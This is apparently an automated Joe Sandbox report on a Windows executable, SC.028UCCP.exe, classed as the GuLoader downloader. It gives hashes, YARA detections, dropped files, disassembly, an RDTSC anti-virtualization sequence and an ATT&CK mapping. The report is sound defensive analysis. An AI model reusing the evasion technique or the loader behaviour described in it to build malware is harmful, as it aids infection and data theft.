Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC.028UCCP.exe

Overview

General Information

Sample Name:SC.028UCCP.exe
Analysis ID:830301
MD5:3f8f4a7f43b5627ed45128bb99f0b471
SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
Tags:exesigned
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
Uses 32bit PE files
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • SC.028UCCP.exe (PID: 5928 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.LamJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SC.028UCCP.exeReversingLabs: Detection: 33%
          Source: SC.028UCCP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
          Source: SC.028UCCP.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SC.028UCCP.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: SC.028UCCP.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: SC.028UCCP.exeString found in binary or memory: http://s.symcd.com06
          Source: SC.028UCCP.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: SC.028UCCP.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: SC.028UCCP.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: SC.028UCCP.exeString found in binary or memory: https://d.symcb.com/cps0%
          Source: SC.028UCCP.exeString found in binary or memory: https://d.symcb.com/rpa0
          Source: SC.028UCCP.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FE3
          Source: SC.028UCCP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310B
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_004048220_2_00404822
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_004062C30_2_004062C3
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00406A9A0_2_00406A9A
          Source: SC.028UCCP.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess Stats: CPU usage > 98%
          Source: SC.028UCCP.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile read: C:\Users\user\Desktop\SC.028UCCP.exeJump to behavior
          Source: SC.028UCCP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SC.028UCCP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\Documents\Snarer.iniJump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\AppData\Local\Temp\nstD527.tmpJump to behavior
          Source: classification engineClassification label: mal76.troj.evad.winEXE@1/4@0/0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042E6

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, type: DROPPED
          Source: Yara matchFile source: 00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SC.028UCCP.exeRDTSC instruction interceptor: First address: 00000000041F6C3D second address: 00000000041F6C3D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB3B0BEAC3Fh 0x00000006 cmp esi, F36905EDh 0x0000000c test edx, ebx 0x0000000e inc ebp 0x0000000f test bl, cl 0x00000011 inc ebx 0x00000012 pushad 0x00000013 mov di, 3123h 0x00000017 cmp di, 3123h 0x0000001c jne 00007FB3B0BEDC0Ah 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
          Source: C:\Users\user\Desktop\SC.028UCCP.exeAPI call chain: ExitProcess graph end nodegraph_0-4045
          Source: C:\Users\user\Desktop\SC.028UCCP.exeAPI call chain: ExitProcess graph end nodegraph_0-4206
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BBA

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path InterceptionPath Interception1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager13
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SC.028UCCP.exe33%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorSC.028UCCP.exefalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorSC.028UCCP.exefalse
              		high

              World Map of Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830301
              Start date and time:2023-03-20 08:44:20 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 28s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:SC.028UCCP.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@1/4@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 60.4% (good quality ratio 59%)
              • Quality average: 87%
              • Quality standard deviation: 23.1%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 44
              • Number of non-executed functions: 33
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: SC.028UCCP.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dllfile.exeGet hashmaliciousFabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, Socelars, lgoogLoaderBrowse
                file.exeGet hashmaliciousFabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, RedLine, SocelarsBrowse
                  vWWBb6OiKq.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, RHADAMANTHYS, Socelars, lgoogLoaderBrowse
                    PO 2300479-MEDPHARM.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      MCME PO - 5700303364.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        PO 2300479-MEDPHARM.exeGet hashmaliciousGuLoaderBrowse
                          MCME PO - 5700303364.exeGet hashmaliciousGuLoaderBrowse
                            jpmm-desktop-external-installer.exeGet hashmaliciousBrowse
                              VisualBeeInstall.exeGet hashmaliciousBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam

                                Download File
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):268768
                                Entropy (8bit):7.143396451103385
                                Encrypted:false
                                SSDEEP:6144:qJAA/mPgVn081S1KOqpIrh02aq18CUcmQd:TA/moVw1HP02J8CUcVd
                                MD5:C6AF2E59D4C09946D5F809241D770F50
                                SHA1:266B1073C52D94E9451AA08B2605F2237E5F8A0C
                                SHA-256:89E42F99BB457998B2FA3A4D0973ABFE9A39163227F56C8D000CCE44F1EF0070
                                SHA-512:B005D4324152790A8BDAAAEE6272A899639FF8D5E1E1FFE1E1219C569F9D271C4A21440F709CA3693A5F80A664501D3AB79EBA81B5B9D07C8870FE5AC15D5124
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, Author: Joe Security
                                Reputation:low
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\ArtDeco_green_7.bmp

                                Download File
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, components 3
                                Category:dropped
                                Size (bytes):5717
                                Entropy (8bit):7.862470085974542
                                Encrypted:false
                                SSDEEP:96:BSTzREom7JPxQ7OTst5UcVq9JD6EgZEoW249KONYq9iwry9t1Bs6UQJaE424CZ:oXRgtPEOa6+q65Zr87YXwry9tzuCZ
                                MD5:B182207A878FA708746DA5A94F08A581
                                SHA1:4EF329C2643A9B5E19F491D644A96EF3E7388BE6
                                SHA-256:40125E69AA66C655FA44F83BBDEB7E9F24FE81D69CC717651A42C908483FF687
                                SHA-512:2368E6533A4D660C08C6F196F38CE2F706C8486AA9E5B1C2413988251184D6A928A348E74DDF0FB098F928D7FCFA4DD71829766E1964E3E5085D642497D034B4
                                Malicious:false
                                Reputation:low
                                Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......9o.^....3N>-.~..-......j.|w.Vu..n..N...#...c......a...M.$......n:..m....?..z..1...^_.1.iE..]O.9..|.6.b.E.vVF..h6.i.=|...~.....H.|.^.U.W.@6..}vz..^ON+....M......{......2OZ..=..@w,..c#..`s.A>....O.<.iw9Y....V...Qx_...@6..';Bg.;...J~...2.#.........~.2:..#..0k.6.K...[k.V....>c.98.-..=..Z&...W.:......

                                C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91\Patronymens.Hov230

                                Download File
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:GTA audio index data (SDT)
                                Category:dropped
                                Size (bytes):42868
                                Entropy (8bit):4.531239376712852
                                Encrypted:false
                                SSDEEP:768:BmzeD2YSUGt8UN3/hCwqfWCixEmPmXZNIYmhaspQZV:BF9SfyUNvrxEmMAHpQT
                                MD5:545F37C048EB23C04FF82F592FB89DEB
                                SHA1:9ED7C0D724A7A1C7E38F2A5134D1325B49FCCF25
                                SHA-256:DA3CADFEE6D3939C607B6F60B12861931ABD8E7441A2C148C396A38957C7D4DF
                                SHA-512:0EB46B15043855818821DD3C60A491E83DF943A30E3BC57E9D37F81AAFF697DFFEF94CE8874A1F61E1E93B7BA2FD740E4FAF7E267BFB1B5B708F1979ED292655
                                Malicious:false
                                Reputation:low
                                Preview:........zz.......++..........^^^...............l....................."".R..............6......cccccc.B.....(..}}....>>>>>.B.?.C..J.O..yy.....C.....!!..MMMM........pp.......................P...'................g.CC...ww........K.......9.;;....X.........W.....6.....%.........+.........ll..........@..CCCC...0.555................R.......iiii...333.....g..WWW........M...........................D.r..............................A.L.[..........5..,........P..X.....................kkkkk...................w............VVVV.......?...........................+...................................gggg.$.......DDDD.??..........m.............................r......`............;.......bb..ZZ.....................z......O...QQ.....!.....................XX......X.........???.>>>.P............L....O.{...............v..........ff.....!!!...K....6........................#....eee...........?......9...........;...........o......``................................kkk..............U...;;;.......$............h....

                                C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll

                                Download File
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):11264
                                Entropy (8bit):5.72460245623286
                                Encrypted:false
                                SSDEEP:96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
                                MD5:CF85183B87314359488B850F9E97A698
                                SHA1:6B6C790037EEC7EBEA4D05590359CB4473F19AEA
                                SHA-256:3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                                SHA-512:FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: file.exe, Detection: malicious, Browse
                                • Filename: file.exe, Detection: malicious, Browse
                                • Filename: vWWBb6OiKq.exe, Detection: malicious, Browse
                                • Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse
                                • Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse
                                • Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse
                                • Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse
                                • Filename: jpmm-desktop-external-installer.exe, Detection: malicious, Browse
                                • Filename: VisualBeeInstall.exe, Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...k..Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.920107350850815
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SC.028UCCP.exe
                                File size:267392
                                MD5:3f8f4a7f43b5627ed45128bb99f0b471
                                SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
                                SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
                                SHA512:800a88ff5985f832c73fbada7fa71175531dbe9bd47a93bc8941817e791d8868cfedd4dad2f82604ce06e1e2136821b963d35e23d580edf2d260475eb213ff6f
                                SSDEEP:6144:4auq7FPth0P6iM7EFsjSHR58yQITE1vE1P57hO5FKHJa:HFPr0SirFjC1yP5NO5FKg
                                TLSH:AE4412172BE645FFF9D78C72103AEAB3F5BBE6580817144E0B266F7A7D00603092969D
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L......Q.................^...........1.......p....@

                                File Icon

                                Icon Hash:b2a88c96b2ca6a72

                                Static PE Info

                                General

                                Entrypoint:0x40310b
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x51E3058F [Sun Jul 14 20:09:51 2013 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:b40f29cd171eb54c01b1dd2683c9c26b

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 8/19/2022 10:31:00 PM 8/18/2025 10:31:00 PM
                                Subject Chain
                                • E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                Version:3
                                Thumbprint MD5:82A2F162C13C97C7C5BD9D1EF5E3E352
                                Thumbprint SHA-1:0A4EF0B597133BD21B48A5030DE4541818CB48DA
                                Thumbprint SHA-256:9B7EDD84EF52310C29E72A78ED7E0EB44C977D6DE7359675C1845C3D1CD29EBC
                                Serial:3E36636B7C2A21B05072BFF828C9540A74C9C941

                                Entrypoint Preview

                                Instruction
                                sub esp, 00000184h
                                push ebx
                                push ebp
                                push esi
                                xor ebx, ebx
                                push edi
                                mov dword ptr [esp+18h], ebx
                                mov dword ptr [esp+10h], 00409190h
                                mov dword ptr [esp+20h], ebx
                                mov byte ptr [esp+14h], 00000020h
                                call dword ptr [00407034h]
                                push 00008001h
                                call dword ptr [004070B0h]
                                push ebx
                                call dword ptr [0040728Ch]
                                push 00000008h
                                mov dword ptr [0042EC58h], eax
                                call 00007FB3B0AB27D8h
                                mov dword ptr [0042EBA4h], eax
                                push ebx
                                lea eax, dword ptr [esp+38h]
                                push 00000160h
                                push eax
                                push ebx
                                push 00428FE0h
                                call dword ptr [00407164h]
                                push 00409180h
                                push 0042E3A0h
                                call 00007FB3B0AB2482h
                                call dword ptr [0040711Ch]
                                mov ebp, 00434000h
                                push eax
                                push ebp
                                call 00007FB3B0AB2470h
                                push ebx
                                call dword ptr [00407114h]
                                cmp byte ptr [00434000h], 00000022h
                                mov dword ptr [0042EBA0h], eax
                                mov eax, ebp
                                jne 00007FB3B0AAFA6Ch
                                mov byte ptr [esp+14h], 00000022h
                                mov eax, 00434001h
                                push dword ptr [esp+14h]
                                push eax
                                call 00007FB3B0AB1F1Dh
                                push eax
                                call dword ptr [00407220h]
                                mov dword ptr [esp+1Ch], eax
                                jmp 00007FB3B0AAFB25h
                                cmp cl, 00000020h
                                jne 00007FB3B0AAFA68h
                                inc eax
                                cmp byte ptr [eax], 00000020h
                                je 00007FB3B0AAFA5Ch

                                Rich Headers

                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x10b0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x3fc200x1860.ndata
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x5de80x5e00False0.6791057180851063data6.503326078284377IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x70000x12da0x1400False0.4388671875data5.095966873256735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x90000x25c980x400False0.63671875data5.037907617207934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x2f0000x150000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x440000x10b00x1200False0.3513454861111111data4.2798158371727295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_BITMAP0x442380x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                RT_ICON0x445a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                RT_DIALOG0x448880x144dataEnglishUnited States
                                RT_DIALOG0x449d00x13cdataEnglishUnited States
                                RT_DIALOG0x44b100x100dataEnglishUnited States
                                RT_DIALOG0x44c100x11cdataEnglishUnited States
                                RT_DIALOG0x44d300x60dataEnglishUnited States
                                RT_GROUP_ICON0x44d900x14dataEnglishUnited States
